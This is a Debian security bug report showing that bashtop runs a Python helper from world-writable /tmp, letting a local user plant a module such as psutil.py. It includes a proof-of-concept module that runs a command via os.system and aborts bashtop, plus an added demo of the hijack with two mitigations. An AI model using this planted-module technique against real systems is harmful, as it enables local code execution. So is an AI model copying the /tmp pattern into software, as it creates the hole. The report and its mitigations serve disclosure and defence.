Package: bashtop Version: 0.9.19-1 Severity: grave Tags: security
bashtop creates a Python script in /tmp and runs it. But Python adds the directory containing the script to the module search path¹, and /tmp is world-writable, so this is insecure. A local user could plant a malicious Python module in /tmp, which would be executed by bashtop.
Proof of concept:

  $ install -m 644 /path/to/psutil.py /tmp
  $ bashtop
   _______
  < pwned >
   -------
          \   ^__^
           \  (oo)\_______
              (__)\       )\/\
                  ||----w |
                  ||     ||
  Aborted

¹ https://docs.python.org/3/using/cmdline.html#cmdarg-script

-- System Information:
Architecture: i386

Versions of packages bashtop depends on:
ii  bash    5.0-6
ii  gawk    1:5.0.1+dfsg-1
ii  procps  2:3.3.16-5

Versions of packages bashtop recommends:
ii  lm-sensors      1:3.6.0-2
un  sysstat         <none>
ii  python3-psutil  5.7.0-1
ii  curl            7.68.0-1

-- 
Jakub Wilk
# psutil.py (the planted module from the proof of concept above): when bashtop's helper
# script in /tmp does "import psutil", this file shadows the real psutil package, runs
# cowsay on the controlling terminal and sends SIGABRT to the parent (bashtop), hence "Aborted".
import os; os.system('(tput reset && cowsay pwned) >/dev/tty; kill -ABRT %s' % os.getppid())
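The following is an added demonstration (not part of the bug report, and not bashtop's code) of the mechanism Jakub describes and of two ways to close it. It assumes a throwaway directory created with tempfile.mkdtemp() standing in for the world-writable /tmp, and the harmless stdlib module colorsys standing in for psutil, so that it can run offline without touching the real /tmp or requiring python3-psutil. It shows that a helper script run from a directory the attacker can write to imports the planted module first; that running the interpreter with -I (isolated mode, which drops the script's directory from sys.path) stops that; and that writing the helper into a private mkdtemp() directory (mode 0700) leaves nowhere for another local user to plant a module at all.

```python
"""Module-search-path hijack from a shared directory, with two mitigations.

Added example; not from the Debian bug report or from bashtop. A mkdtemp()
directory stands in for /tmp and colorsys stands in for psutil (both constructed
choices so the demo runs offline and leaves the real /tmp alone).
"""
import os
import shutil
import stat
import subprocess
import sys
import tempfile

# Stand-in for the helper script bashtop writes out (constructed). It reports
# whether the module it imported is the genuine stdlib one or a planted copy.
HELPER_SOURCE = (
    "import colorsys\n"
    "print('PLANTED' if getattr(colorsys, 'PLANTED', False) else 'GENUINE')\n"
)

# Stand-in for the attacker's /tmp/psutil.py from the proof of concept: a module
# that merely marks itself, instead of running a payload.
PLANTED_SOURCE = "PLANTED = True\n"


def plant_module(workdir: str) -> str:
    """Simulate a local attacker dropping colorsys.py into the shared directory."""
    path = os.path.join(workdir, "colorsys.py")
    with open(path, "w", encoding="utf-8") as fh:
        fh.write(PLANTED_SOURCE)
    return path


def run_helper(workdir: str, isolated: bool) -> str:
    """Write the helper into workdir and run it with the current interpreter.

    isolated=True adds -I, which (since Python 3.4) keeps the script's own
    directory out of sys.path, so a sibling colorsys.py is never considered.
    Returns the single line the helper prints: 'PLANTED' or 'GENUINE'.
    """
    script = os.path.join(workdir, "helper.py")
    with open(script, "w", encoding="utf-8") as fh:
        fh.write(HELPER_SOURCE)
    cmd = [sys.executable] + (["-I"] if isolated else []) + [script]
    proc = subprocess.run(cmd, capture_output=True, text=True, check=True)
    return proc.stdout.strip()


def private_dir_mode(path: str) -> str:
    """Permission bits of a directory as an octal string, e.g. '0o700'."""
    return oct(stat.S_IMODE(os.stat(path).st_mode))


def demo() -> dict:
    """Run the three scenarios and return their outcomes keyed by scenario."""
    results = {}
    shared = tempfile.mkdtemp(prefix="shared-")   # plays the role of /tmp
    private = tempfile.mkdtemp(prefix="private-")  # mkdtemp() creates mode 0700
    try:
        plant_module(shared)
        # 1. Vulnerable: helper in the shared dir, default interpreter flags.
        results["shared_default"] = run_helper(shared, isolated=False)
        # 2. Mitigation A: same shared dir, but python3 -I ignores the script dir.
        results["shared_isolated"] = run_helper(shared, isolated=True)
        # 3. Mitigation B: helper lives in a directory only this user can write.
        results["private_mode"] = private_dir_mode(private)
        results["private_default"] = run_helper(private, isolated=False)
    finally:
        shutil.rmtree(shared, ignore_errors=True)
        shutil.rmtree(private, ignore_errors=True)
    return results


if __name__ == "__main__":
    for scenario, outcome in demo().items():
        print(f"{scenario}: {outcome}")
```

Either mitigation on its own is enough for the search-path problem; the private directory additionally removes the classic /tmp symlink and pre-creation races, so a packaged fix would normally do both.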